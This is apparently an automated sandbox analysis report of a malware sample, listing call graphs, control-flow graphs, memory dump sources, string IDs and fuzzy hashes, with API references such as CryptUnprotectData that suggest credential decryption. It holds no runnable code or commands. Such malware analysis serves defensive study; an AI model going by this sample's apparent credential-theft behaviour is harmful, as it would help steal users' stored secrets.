ad030 43681 ad048 43680->43681 43682 ad0a2 43681->43682 43688 36451bc1 43681->43688 43699 364502b8 43681->43699 43704 364502c8 43681->43704 43709 36451bd0 43681->43709 43720 364503f0 43681->43720 43690 36451bd0 43688->43690 43689 36451c31 43693 36451c2f 43689->43693 43757 36451854 43689->43757 43690->43689 43692 36451c21 43690->43692 43692->43693 43723 36451d58 43692->43723 43732 36451d48 43692->43732 43741 36459e44 43692->43741 43747 36459d68 43692->43747 43752 36459d78 43692->43752 43700 364502ee 43699->43700 43702 36451bc1 4 API calls 43700->43702 43703 36451bd0 4 API calls 43700->43703 43701 3645030f 43701->43682 43702->43701 43703->43701 43705 364502ee 43704->43705 43707 36451bc1 4 API calls 43705->43707 43708 36451bd0 4 API calls 43705->43708 43706 3645030f 43706->43682 43707->43706 43708->43706 43712 36451bfd 43709->43712 43710 36451c31 43711 36451854 CallWindowProcW 43710->43711 43714 36451c2f 43710->43714 43711->43714 43712->43710 43713 36451c21 43712->43713 43713->43714 43715 36459e44 3 API calls 43713->43715 43716 36451d48 2 API calls 43713->43716 43717 36451d58 2 API calls 43713->43717 43718 36459d68 3 API calls 43713->43718 43719 36459d78 3 API calls 43713->43719 43715->43714 43716->43714 43717->43714 43718->43714 43719->43714 43721 36450407 43720->43721 43782 36450840 43720->43782 43721->43682 43724 36451d66 43723->43724 43725 36451d93 43723->43725 43726 36451d6e 43724->43726 43729 36451854 CallWindowProcW 43724->43729 43725->43724 43727 36451d98 43725->43727 43726->43693 43728 36451874 GetCurrentThreadId 43727->43728 43730 36451da4 43728->43730 43731 36451dac 43729->43731 43730->43693 43731->43693 43733 36451d58 43732->43733 43734 36451d66 43733->43734 43735 36451d98 43733->43735 43737 36451854 CallWindowProcW 43734->43737 43740 36451d6e 43734->43740 43736 36451874 GetCurrentThreadId 43735->43736 43738 36451da4 43736->43738 43739 36451dac 43737->43739 43738->43693 43739->43693 43740->43693 43742 36459e52 43741->43742 43743 36459e02 43741->43743 43761 36459e21 43743->43761 43766 36459e30 43743->43766 43744 36459e18 43744->43693 43748 36459d8c 43747->43748 43750 36459e21 3 API calls 43748->43750 43751 36459e30 3 API calls 43748->43751 43749 36459e18 43749->43693 43750->43749 43751->43749 43754 36459d8c 43752->43754 43753 36459e18 43753->43693 43755 36459e21 3 API calls 43754->43755 43756 36459e30 3 API calls 43754->43756 43755->43753 43756->43753 43758 3645185f 43757->43758 43759 36451e5a CallWindowProcW 43758->43759 43760 36451e09 43758->43760 43759->43760 43760->43693 43762 36459e41 43761->43762 43771 3645a3d8 43761->43771 43775 3645aff0 43761->43775 43778 3645a3e8 43761->43778 43762->43744 43767 3645a3d8 2 API calls 43766->43767 43768 3645a3e8 2 API calls 43766->43768 43769 36459e41 43766->43769 43770 3645aff0 CallWindowProcW 43766->43770 43767->43769 43768->43769 43769->43744 43770->43769 43772 3645a434 43771->43772 43773 364593b4 2 API calls 43772->43773 43774 3645a47d 43772->43774 43773->43774 43774->43762 43776 36451854 CallWindowProcW 43775->43776 43777 3645b00a 43776->43777 43777->43762 43779 3645a434 43778->43779 43780 364593b4 2 API calls 43779->43780 43781 3645a47d 43779->43781 43780->43781 43781->43762 43783 36450856 43782->43783 43785 36450938 10 API calls 43782->43785 43786 36450928 43782->43786 43783->43721 43785->43783 43787 36450948 43786->43787 43788 36450965 43787->43788 43789 36450971 6 API calls 43787->43789 43790 36450980 6 API calls 43787->43790 43788->43783 43789->43788 43790->43788

                                                                                                            Executed Functions

                                                                                                            Function 000D66B8 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 191 d66b8-d66ed 192 d6b1c-d6b20 191->192 193 d66f3-d6716 191->193 194 d6b39-d6b47 192->194 195 d6b22-d6b36 192->195 202 d671c-d6729 193->202 203 d67c4-d67c8 193->203 200 d6b49-d6b5e 194->200 201 d6bb8-d6bcd 194->201 211 d6b65-d6b72 200->211 212 d6b60-d6b63 200->212 213 d6bcf-d6bd2 201->213 214 d6bd4-d6be1 201->214 217 d6738 202->217 218 d672b-d6736 202->218 204 d67ca-d67d8 203->204 205 d6810-d6819 203->205 204->205 226 d67da-d67f5 204->226 208 d6c2f 205->208 209 d681f-d6829 205->209 227 d6c34-d6c64 208->227 209->192 215 d682f-d6838 209->215 219 d6b74-d6bb5 211->219 212->219 220 d6be3-d6c1e 213->220 214->220 224 d683a-d683f 215->224 225 d6847-d6853 215->225 221 d673a-d673c 217->221 218->221 268 d6c25-d6c2c 220->268 221->203 228 d6742-d67a4 221->228 224->225 225->227 231 d6859-d685f 225->231 251 d67f7-d6801 226->251 252 d6803 226->252 244 d6c7d-d6c84 227->244 245 d6c66-d6c7c 227->245 279 d67aa-d67c1 228->279 280 d67a6 228->280 234 d6865-d6875 231->234 235 d6b06-d6b0a 231->235 249 d6889-d688b 234->249 250 d6877-d6887 234->250 235->208 238 d6b10-d6b16 235->238 238->192 238->215 253 d688e-d6894 249->253 250->253 254 d6805-d6807 251->254 252->254 253->235 255 d689a-d68a9 253->255 254->205 256 d6809 254->256 263 d68af 255->263 264 d6957-d6982 call d6500 * 2 255->264 256->205 266 d68b2-d68c3 263->266 281 d6a6c-d6a86 264->281 282 d6988-d698c 264->282 266->227 270 d68c9-d68db 266->270 270->227 272 d68e1-d68fb call d6c98 270->272 275 d6901-d6911 272->275 275->235 278 d6917-d691a 275->278 283 d691c-d6922 278->283 284 d6924-d6927 278->284 279->203 280->279 281->192 304 d6a8c-d6a90 281->304 282->235 286 d6992-d6996 282->286 283->284 287 d692d-d6930 283->287 284->208 284->287 289 d69be-d69c4 286->289 290 d6998-d69a5 286->290 291 d6938-d693b 287->291 292 d6932-d6936 287->292 293 d69ff-d6a05 289->293 294 d69c6-d69ca 289->294 307 d69b4 290->307 308 d69a7-d69b2 290->308 291->208 295 d6941-d6945 291->295 292->291 292->295 297 d6a07-d6a0b 293->297 298 d6a11-d6a17 293->298 294->293 296 d69cc-d69d5 294->296 295->208 301 d694b-d6951 295->301 302 d69e4-d69fa 296->302 303 d69d7-d69dc 296->303 297->268 297->298 305 d6a19-d6a1d 298->305 306 d6a23-d6a25 298->306 301->264 301->266 302->235 303->302 309 d6acc-d6ad0 304->309 310 d6a92-d6a9c call d53a8 304->310 305->235 305->306 311 d6a5a-d6a5c 306->311 312 d6a27-d6a30 306->312 313 d69b6-d69b8 307->313 308->313 309->268 316 d6ad6-d6ada 309->316 310->309 324 d6a9e-d6ab3 310->324 311->235 314 d6a62-d6a69 311->314 319 d6a3f-d6a55 312->319 320 d6a32-d6a37 312->320 313->235 313->289 316->268 321 d6ae0-d6aed 316->321 319->235 320->319 327 d6afc 321->327 328 d6aef-d6afa 321->328 324->309 332 d6ab5-d6aca 324->332 329 d6afe-d6b00 327->329 328->329 329->235 329->268 332->192 332->309
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                            • API String ID: 0-2212926057
                                                                                                            • Opcode ID: b59c8e4cd2ae55a22169a0e1f39c94d2a257316dec1efa9b2a8f7c29620bda31
                                                                                                            • Instruction ID: 2b7ee6c5e037520608795b4cd92795e9d9652023b35f5f647925cd6c9575bb8d
                                                                                                            • Opcode Fuzzy Hash: b59c8e4cd2ae55a22169a0e1f39c94d2a257316dec1efa9b2a8f7c29620bda31
                                                                                                            • Instruction Fuzzy Hash: 41125A30A003489FCB54DF68D994AAEBBF2AF49314F15865AE845DB361DB32ED41CB60
                                                                                                            Function 000D5F90 Relevance: 9.2, Strings: 7, Instructions: 465COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 336 d5f90-d5fc6 467 d5fc8 call d5f90 336->467 468 d5fc8 call d60e0 336->468 337 d5fce-d5fd4 338 d6024-d6028 337->338 339 d5fd6-d5fda 337->339 342 d603f-d6053 338->342 343 d602a-d6039 338->343 340 d5fdc-d5fe1 339->340 341 d5fe9-d5ff0 339->341 340->341 344 d60c6-d6103 341->344 345 d5ff6-d5ffd 341->345 465 d6055 call d9048 342->465 466 d6055 call d8d90 342->466 346 d603b-d603d 343->346 347 d6065-d606f 343->347 357 d610e-d612e 344->357 358 d6105-d610b 344->358 345->338 351 d5fff-d6003 345->351 348 d605b-d6062 346->348 349 d6079-d607d 347->349 350 d6071-d6077 347->350 353 d6085-d60bf 349->353 354 d607f 349->354 350->353 355 d6005-d600a 351->355 356 d6012-d6019 351->356 353->344 354->353 355->356 356->344 359 d601f-d6022 356->359 364 d6135-d613c 357->364 365 d6130 357->365 358->357 359->348 368 d613e-d6149 364->368 367 d64c4-d64cd 365->367 369 d614f-d6162 368->369 370 d64d5-d6511 368->370 375 d6178-d6193 369->375 376 d6164-d6172 369->376 379 d651a-d651e 370->379 380 d6513-d6518 370->380 384 d6195-d619b 375->384 385 d61b7-d61ba 375->385 376->375 382 d644c-d6453 376->382 383 d6524-d6525 379->383 380->383 382->367 388 d6455-d6457 382->388 386 d619d 384->386 387 d61a4-d61a7 384->387 389 d6314-d631a 385->389 390 d61c0-d61c3 385->390 386->387 386->389 391 d61da-d61e0 386->391 392 d6406-d6409 386->392 387->391 393 d61a9-d61ac 387->393 394 d6459-d645e 388->394 395 d6466-d646c 388->395 389->392 396 d6320-d6325 389->396 390->389 397 d61c9-d61cf 390->397 399 d61e6-d61e8 391->399 400 d61e2-d61e4 391->400 401 d640f-d6415 392->401 402 d64d0 392->402 403 d6246-d624c 393->403 404 d61b2 393->404 394->395 395->370 405 d646e-d6473 395->405 396->392 397->389 398 d61d5 397->398 398->392 407 d61f2-d61fb 399->407 400->407 408 d643a-d643e 401->408 409 d6417-d641f 401->409 402->370 403->392 406 d6252-d6258 403->406 404->392 410 d64b8-d64bb 405->410 411 d6475-d647a 405->411 413 d625e-d6260 406->413 414 d625a-d625c 406->414 416 d61fd-d6208 407->416 417 d620e-d6236 407->417 408->382 418 d6440-d6446 408->418 409->370 415 d6425-d6434 409->415 410->402 419 d64bd-d64c2 410->419 411->402 412 d647c 411->412 420 d6483-d6488 412->420 421 d626a-d6281 413->421 414->421 415->375 415->408 416->392 416->417 439 d623c-d6241 417->439 440 d632a-d6360 417->440 418->368 418->382 419->367 419->388 422 d64aa-d64ac 420->422 423 d648a-d648c 420->423 432 d62ac-d62d3 421->432 433 d6283-d629c 421->433 422->402 430 d64ae-d64b1 422->430 427 d648e-d6493 423->427 428 d649b-d64a1 423->428 427->428 428->370 431 d64a3-d64a8 428->431 430->410 431->422 435 d647e-d6481 431->435 432->402 444 d62d9-d62dc 432->444 433->440 445 d62a2-d62a7 433->445 435->402 435->420 439->440 446 d636d-d6375 440->446 447 d6362-d6366 440->447 444->402 448 d62e2-d630b 444->448 445->440 446->402 451 d637b-d6380 446->451 449 d6368-d636b 447->449 450 d6385-d6389 447->450 448->440 463 d630d-d6312 448->463 449->446 449->450 452 d63a8-d63ac 450->452 453 d638b-d6391 450->453 451->392 456 d63ae-d63b4 452->456 457 d63b6-d63d5 call d66b8 452->457 453->452 455 d6393-d639b 453->455 455->402 458 d63a1-d63a6 455->458 456->457 460 d63db-d63df 456->460 457->460 458->392 460->392 461 d63e1-d63fd 460->461 461->392 463->440 465->348 466->348 467->337 468->337
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq$(oq$(oq$,q$,q$\K$3hK$3K$3$N$3$O$3xO$3
                                                                                                            • API String ID: 0-1102877618
                                                                                                            • Opcode ID: 2a235322f7b7abc3f276047a026ae7a88ea7a19100998b5c3891b2d3d2634b8b
                                                                                                            • Instruction ID: 02f25ad6c7af47a631c66802eb3ec1de3da70ba6e673dcff882308c1f2c5e67b
                                                                                                            • Opcode Fuzzy Hash: 2a235322f7b7abc3f276047a026ae7a88ea7a19100998b5c3891b2d3d2634b8b
                                                                                                            • Instruction Fuzzy Hash: B6122D30A00219DFDB54CFA9C954AAEBBF2FF89314F15806AE405AB361DB36DD41CB60
                                                                                                            Function 3645D6E8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 396COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 469 3645d6e8-3645d74b 470 3645d74d-3645d777 469->470 471 3645d77a-3645d798 469->471 470->471 476 3645d7a1-3645d7d8 471->476 477 3645d79a-3645d79c 471->477 481 3645d7de-3645d7f2 476->481 482 3645dc09 476->482 479 3645dc5a-3645dc6f 477->479 483 3645d7f4-3645d81e 481->483 484 3645d821-3645d840 481->484 485 3645dc0e-3645dc24 482->485 483->484 491 3645d842-3645d848 484->491 492 3645d858-3645d85a 484->492 485->479 494 3645d84c-3645d84e 491->494 495 3645d84a 491->495 496 3645d85c-3645d874 492->496 497 3645d879-3645d882 492->497 494->492 495->492 496->485 498 3645d88a-3645d891 497->498 499 3645d893-3645d899 498->499 500 3645d89b-3645d8a2 498->500 501 3645d8af-3645d8cc call 3645c678 499->501 502 3645d8a4-3645d8aa 500->502 503 3645d8ac 500->503 506 3645da21-3645da25 501->506 507 3645d8d2-3645d8d9 501->507 502->501 503->501 509 3645dbf4-3645dc07 506->509 510 3645da2b-3645da2f 506->510 507->482 508 3645d8df-3645d91c 507->508 518 3645d922-3645d927 508->518 519 3645dbea-3645dbee 508->519 509->485 511 3645da31-3645da44 510->511 512 3645da49-3645da52 510->512 511->485 513 3645da54-3645da7e 512->513 514 3645da81-3645da88 512->514 513->514 516 3645db27-3645db3c 514->516 517 3645da8e-3645da95 514->517 516->519 531 3645db42-3645db44 516->531 521 3645dac4-3645dae6 517->521 522 3645da97-3645dac1 517->522 523 3645d959-3645d96e call 3645c69c 518->523 524 3645d929-3645d937 call 3645c684 518->524 519->498 519->509 521->516 560 3645dae8-3645daf2 521->560 522->521 529 3645d973-3645d977 523->529 524->523 534 3645d939-3645d957 call 3645c690 524->534 535 3645d979-3645d98b call 36450938 call 3645c6a8 529->535 536 3645d9e8-3645d9f5 529->536 537 3645db46-3645db7f 531->537 538 3645db91-3645dbae call 3645c678 531->538 534->529 563 3645d98d-3645d9bd 535->563 564 3645d9cb-3645d9e3 535->564 536->519 552 3645d9fb-3645da05 call 3645c6b8 536->552 555 3645db81-3645db87 537->555 556 3645db88-3645db8f 537->556 538->519 551 3645dbb0-3645dbdc WaitMessage 538->551 557 3645dbe3 551->557 558 3645dbde 551->558 566 3645da14-3645da1c call 3645c6d0 552->566 567 3645da07-3645da0a call 3645c6c4 552->567 555->556 556->519 557->519 558->557 571 3645daf4-3645dafa 560->571 572 3645db0a-3645db25 560->572 578 3645d9c4 563->578 579 3645d9bf 563->579 564->485 566->519 574 3645da0f 567->574 576 3645dafc 571->576 577 3645dafe-3645db00 571->577 572->516 572->560 574->519 576->572 577->572 578->564 579->578
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DispatchMessage
                                                                                                            • String ID: $zZ6$$zZ6$$zZ6$$zZ6
                                                                                                            • API String ID: 2061451462-1758902879
                                                                                                            • Opcode ID: d907b28e371f49c162440c1cab69c2ec122265d43b8ef03d22574f03dca59df5
                                                                                                            • Instruction ID: 16ec74deb8b9e93b241c23c98f6a92ca5b8b2abb82ddca978f43229bf9c38c28
                                                                                                            • Opcode Fuzzy Hash: d907b28e371f49c162440c1cab69c2ec122265d43b8ef03d22574f03dca59df5
                                                                                                            • Instruction Fuzzy Hash: 12F14674E00309CFEB05DFA9C844B9DBBF2BF88304F168168E505AB265DBB4E945CB85
                                                                                                            Function 000D19B8 Relevance: 8.2, Strings: 6, Instructions: 685COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 582 d19b8-d1a13 586 d1a35-d1a84 582->586 587 d1a15-d1a34 582->587 591 d1a9f 586->591 592 d1a86-d1a8d 586->592 596 d1aa7 591->596 593 d1a8f-d1a94 592->593 594 d1a96-d1a9d 592->594 595 d1aaa-d1abe 593->595 594->595 598 d1ad4-d1adc 595->598 599 d1ac0-d1ac7 595->599 596->595 603 d1ade-d1ae2 598->603 600 d1acd-d1ad2 599->600 601 d1ac9-d1acb 599->601 600->603 601->603 604 d1ae4-d1af9 603->604 605 d1b42-d1b45 603->605 604->605 612 d1afb-d1afe 604->612 606 d1b8d-d1b93 605->606 607 d1b47-d1b5c 605->607 609 d268e 606->609 610 d1b99-d1b9b 606->610 607->606 614 d1b5e-d1b62 607->614 617 d2693-d2ca1 609->617 610->609 613 d1ba1-d1ba6 610->613 615 d1b1d-d1b3b call d02a8 612->615 616 d1b00-d1b02 612->616 618 d263c-d2640 613->618 619 d1bac 613->619 622 d1b6a-d1b88 call d02a8 614->622 623 d1b64-d1b68 614->623 615->605 616->615 624 d1b04-d1b07 616->624 642 d2ca3-d2ca5 617->642 643 d2cb2-d2cba 617->643 620 d2647-d268d 618->620 621 d2642-d2645 618->621 619->618 621->617 621->620 622->606 623->606 623->622 624->605 628 d1b09-d1b1b 624->628 628->605 628->615 644 d2cab-d2cb0 642->644 645 d2ca7-d2ca9 642->645 646 d2cbc-d2cca 643->646 644->646 645->646 649 d2ccc-d2cce 646->649 650 d2ce0-d2ce8 646->650 651 d2cd7-d2cde 649->651 652 d2cd0-d2cd5 649->652 653 d2ceb-d2cee 650->653 651->653 652->653 655 d2d05-d2d09 653->655 656 d2cf0-d2cfe 653->656 657 d2d0b-d2d19 655->657 658 d2d22-d2d25 655->658 656->655 664 d2d00 656->664 657->658 665 d2d1b 657->665 659 d2d2d-d2d62 658->659 660 d2d27-d2d2b 658->660 671 d2dc4-d2dc9 659->671 660->659 663 d2d64-d2d7b 660->663 667 d2d7d-d2d7f 663->667 668 d2d81-d2d8d 663->668 664->655 665->658 667->671 669 d2d8f-d2d95 668->669 670 d2d97-d2da1 668->670 672 d2da9 669->672 670->672 673 d2da3 670->673 675 d2db1-d2dbd 672->675 673->672 675->671
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xq$Xq$Xq$Xq$Xq$Xq
                                                                                                            • API String ID: 0-905847027
                                                                                                            • Opcode ID: 753e84714d054c2d14a54e3ff5b5eed4b87b352dc436216fa5a0a53021e9c6c4
                                                                                                            • Instruction ID: e8c45b37dd5097ade50a5227fad7dd37f7628338f1f9e00e64a7e9620cfaa463
                                                                                                            • Opcode Fuzzy Hash: 753e84714d054c2d14a54e3ff5b5eed4b87b352dc436216fa5a0a53021e9c6c4
                                                                                                            • Instruction Fuzzy Hash: 3042B1BAE6D7E54BD712CB306878295BFF0AB62204B1E4DDED0C192193D7A0C486C767
                                                                                                            Function 000D9048 Relevance: 3.4, Strings: 2, Instructions: 898COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (oq$4'q
                                                                                                            • API String ID: 0-1336004174
                                                                                                            • Opcode ID: c291fb15cd5347f60a4e66cf140df22063cca37f199ea354bf7ccab1ec995f03
                                                                                                            • Instruction ID: 75ec393ee28c43dd6d00f5c116ad2adcbbf698864e2527d2f22814e52526b240
                                                                                                            • Opcode Fuzzy Hash: c291fb15cd5347f60a4e66cf140df22063cca37f199ea354bf7ccab1ec995f03
                                                                                                            • Instruction Fuzzy Hash: 95825C71A04209DFCB15CFA8C984AAEBBF2FF88310F15855AE4059B3A5D731ED41CBA5
                                                                                                            Function 3645E8A8 Relevance: 3.3, Strings: 2, Instructions: 764COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1998 3645e8a8-3645e8d3 1999 3645e8d5 1998->1999 2000 3645e8da-3645e93a 1998->2000 1999->2000 2002 3645e940-3645ea51 2000->2002 2003 3645ec6d-3645ec95 2000->2003 2045 3645ea53-3645ea5f 2002->2045 2046 3645ea7b 2002->2046 2006 3645f420-3645f448 2003->2006 2007 3645ec9b-3645ecc8 2003->2007 2014 3645f6e1 2006->2014 2015 3645f44e-3645f625 2006->2015 2011 3645efc6-3645f331 2007->2011 2012 3645ecce-3645eed2 2007->2012 2159 3645f333-3645f348 2011->2159 2160 3645f34a-3645f35b 2011->2160 2114 3645eed4-3645eee9 2012->2114 2115 3645eeeb-3645eefc 2012->2115 2016 3645f6e2-3645f6e9 2014->2016 2173 3645f62b call d324d 2015->2173 2174 3645f62b call d3168 2015->2174 2049 3645ea61-3645ea67 2045->2049 2050 3645ea69-3645ea6f 2045->2050 2051 3645ea81-3645ec23 2046->2051 2053 3645ea79 2049->2053 2050->2053 2129 3645ec25-3645ec31 2051->2129 2130 3645ec32-3645ec33 2051->2130 2053->2051 2123 3645eefd-3645efc1 2114->2123 2115->2123 2118 3645f630-3645f6af call 35f2cc28 2140 3645f6b4-3645f6b6 2118->2140 2152 3645f41f 2123->2152 2129->2130 2130->2003 2140->2016 2152->2006 2163 3645f35c-3645f41e 2159->2163 2160->2163 2163->2152 2173->2118 2174->2118
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2650189669.0000000036450000.00000040.00000800.00020000.00000000.sdmp, Offset: 36450000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_36450000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Teq$pGq
                                                                                                            • API String ID: 0-4004436683
                                                                                                            • Opcode ID: cd873173861a8366ddc13d99e8699ce02a5148724bc728b22edba89776f9c61e
                                                                                                            • Instruction ID: faa99f13db7a49b945e06a938bf8b09dc31cdb677f7964ccf41bc74c1aa33356
                                                                                                            • Opcode Fuzzy Hash: cd873173861a8366ddc13d99e8699ce02a5148724bc728b22edba89776f9c61e
                                                                                                            • Instruction Fuzzy Hash: BE829374A00228DFDB25DF65C894BA9BBB2FB89300F1081E9D90A77355DB719E82CF54
                                                                                                            Function 35F2BDF0 Relevance: 3.3, Strings: 2, Instructions: 758COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2176 35f2bdf0-35f2be10 2177 35f2be12 2176->2177 2178 35f2be17-35f2be77 2176->2178 2177->2178 2180 35f2c1aa-35f2c1d2 2178->2180 2181 35f2be7d-35f2bf8e 2178->2181 2184 35f2c1d8-35f2c1ff 2180->2184 2185 35f2c959-35f2c981 2180->2185 2223 35f2bf90-35f2bf9c 2181->2223 2224 35f2bfb8 2181->2224 2189 35f2c205-35f2c40a 2184->2189 2190 35f2c4fe-35f2c86a 2184->2190 2191 35f2cc10 2185->2191 2192 35f2c987-35f2cb62 2185->2192 2292 35f2c423-35f2c434 2189->2292 2293 35f2c40c-35f2c421 2189->2293 2336 35f2c883-35f2c894 2190->2336 2337 35f2c86c-35f2c881 2190->2337 2194 35f2cc11-35f2cc17 2191->2194 2350 35f2cb68 call d324d 2192->2350 2351 35f2cb68 call d3168 2192->2351 2229 35f2bfa6-35f2bfac 2223->2229 2230 35f2bf9e-35f2bfa4 2223->2230 2226 35f2bfbe-35f2c160 2224->2226 2304 35f2c162-35f2c16e 2226->2304 2305 35f2c16f 2226->2305 2231 35f2bfb6 2229->2231 2230->2231 2231->2226 2299 35f2c435-35f2c4f9 2292->2299 2293->2299 2295 35f2cb6d-35f2cbdd call 35f2cc28 2316 35f2cbe3-35f2cbe5 2295->2316 2328 35f2c958 2299->2328 2304->2305 2305->2180 2316->2194 2328->2185 2340 35f2c895-35f2c957 2336->2340 2337->2340 2340->2328 2350->2295 2351->2295
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2649977396.0000000035F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 35F20000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_35f20000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Teq$pGq
                                                                                                            • API String ID: 0-4004436683
                                                                                                            • Opcode ID: d9d57d2b6dbdf63f443ed8f9d1ec4accd36265feeffc789bbbce06a77aa6dccb
                                                                                                            • Instruction ID: d61c65f2184d20e9bb9b3c73c4414749d6c7045bfd63717dbcd02dd487c28546
                                                                                                            • Opcode Fuzzy Hash: d9d57d2b6dbdf63f443ed8f9d1ec4accd36265feeffc789bbbce06a77aa6dccb
                                                                                                            • Instruction Fuzzy Hash: 3A72A374A01218DFDB65DF65C894BA9BBB2FB89300F1085E9D80AB7354CB719E82CF54
                                                                                                            Function 000D4328 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2622104804.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_d0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PHq$PHq
                                                                                                            • API String ID: 0-1274609152
                                                                                                            • Opcode ID: 9489246368f92bda6fff731b1be45bd88a6d1a01efd37cbd93552aca34c7d10e
                                                                                                            • Instruction ID: aa817416184edf00799011008dd34869911cfee8a78392ef834c4819a8f48713
                                                                                                            • Opcode Fuzzy Hash: 9489246368f92bda6fff731b1be45bd88a6d1a01efd37cbd93552aca34c7d10e
                                                                                                            • Instruction Fuzzy Hash: 6991A374E002588FEB54DFA9D884A9DBBF2BF89300F14816AE419BB365DB349981CF51
                                                                                                            Function 331ED1EC Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000B2,?,00000000,?,?,?,?), ref: 331EDA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: eaa86e37e50b940b7fb1c1dd9f57951356a8a04cfb18e1fe12e2807dc985fede
                                                                                                            • Instruction ID: 29a16742f774567dbe8a4b21b504206f887094fba0b03528922137a928bc8835
                                                                                                            • Opcode Fuzzy Hash: eaa86e37e50b940b7fb1c1dd9f57951356a8a04cfb18e1fe12e2807dc985fede
                                                                                                            • Instruction Fuzzy Hash: 9D1137B6800349DFDB10CF99C845BEEBBF4EF48320F148419E958A7210C379A990CFA5
                                                                                                            Function 331ED9D9 Relevance: 1.6, APIs: 1, Instructions: 54encryptionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CryptUnprotectData.CRYPT32(000000B2,?,00000000,?,?,?,?), ref: 331EDA45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2646395699.00000000331E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 331E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_331e0000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CryptDataUnprotect
                                                                                                            • String ID:
                                                                                                            • API String ID: 834300711-0
                                                                                                            • Opcode ID: e42fb7028fcfed65d4e7b468b4f6fed0bc699a5bac02c95aae929c7913647622
                                                                                                            • Instruction ID: 78df1b8ec9a5cb09cd6090974ab6ca6466fd5d08080cff2280d8d65b3f33502f
                                                                                                            • Opcode Fuzzy Hash: e42fb7028fcfed65d4e7b468b4f6fed0bc699a5bac02c95aae929c7913647622
